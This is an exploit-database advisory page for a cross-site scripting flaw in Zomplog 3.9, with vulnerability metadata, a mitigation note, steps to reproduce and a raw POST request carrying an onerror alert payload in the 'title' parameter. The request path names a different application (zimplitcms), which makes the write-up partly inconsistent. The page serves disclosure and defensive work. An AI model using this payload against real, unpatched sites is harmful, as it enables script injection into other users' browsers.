header-logo
Suggest Exploit
vendor:
Zomplog
by:
Mirabbas Agalarov
5.5
CVSS
MEDIUM
Cross-site scripting (XSS)
79
CWE
Product Name: Zomplog
Affected Version From: Zomplog v3.9
Affected Version To: Zomplog v3.9
Patch Exists: NO
Related CWE:
CPE: a:zomplog:zomplog:3.9
Metasploit:
Other Scripts:
Platforms Tested: Linux
2023

Zomplog 3.9 – Cross-site scripting (XSS)

The Zomplog v3.9 application is vulnerable to cross-site scripting (XSS) attacks. An attacker can exploit this vulnerability by injecting malicious code into the 'title' parameter of the POST request. This can lead to the execution of arbitrary JavaScript code in the context of the victim's browser.

Mitigation:

To mitigate this vulnerability, the vendor should sanitize user input before using it in the application. Users are advised to update to a patched version of the software when available.
Source

Exploit-DB raw data:

Exploit Title: Zomplog 3.9 - Cross-site scripting (XSS)
Application: Zomplog
Version: v3.9
Bugs:  XSS
Technology: PHP
Vendor URL: http://zomp.nl/zomplog/
Software Link: http://zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip
Date of found: 22.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
steps: 
1. Login to account
2. Add new page
3. Set as <img src=x onerror=alert(4)>
4. Go to menu

Poc request:

POST /zimplitcms/zimplit.php?action=copyhtml&file=index.html&newname=img_src=x_onerror=alert(5).html&title=%3Cimg%20src%3Dx%20onerror%3Dalert(5)%3E HTTP/1.1
Host: localhost
Content-Length: 11
sec-ch-ua: 
Accept: */*
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/zimplitcms/zimplit.php?action=load&file=index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ZsessionLang=en; ZsessionId=tns0pu8urk9nl78nivpm; ZeditorData=sidemenuStatus:open
Connection: close

empty=empty

Navigation

Suggest Exploit

Services By CQR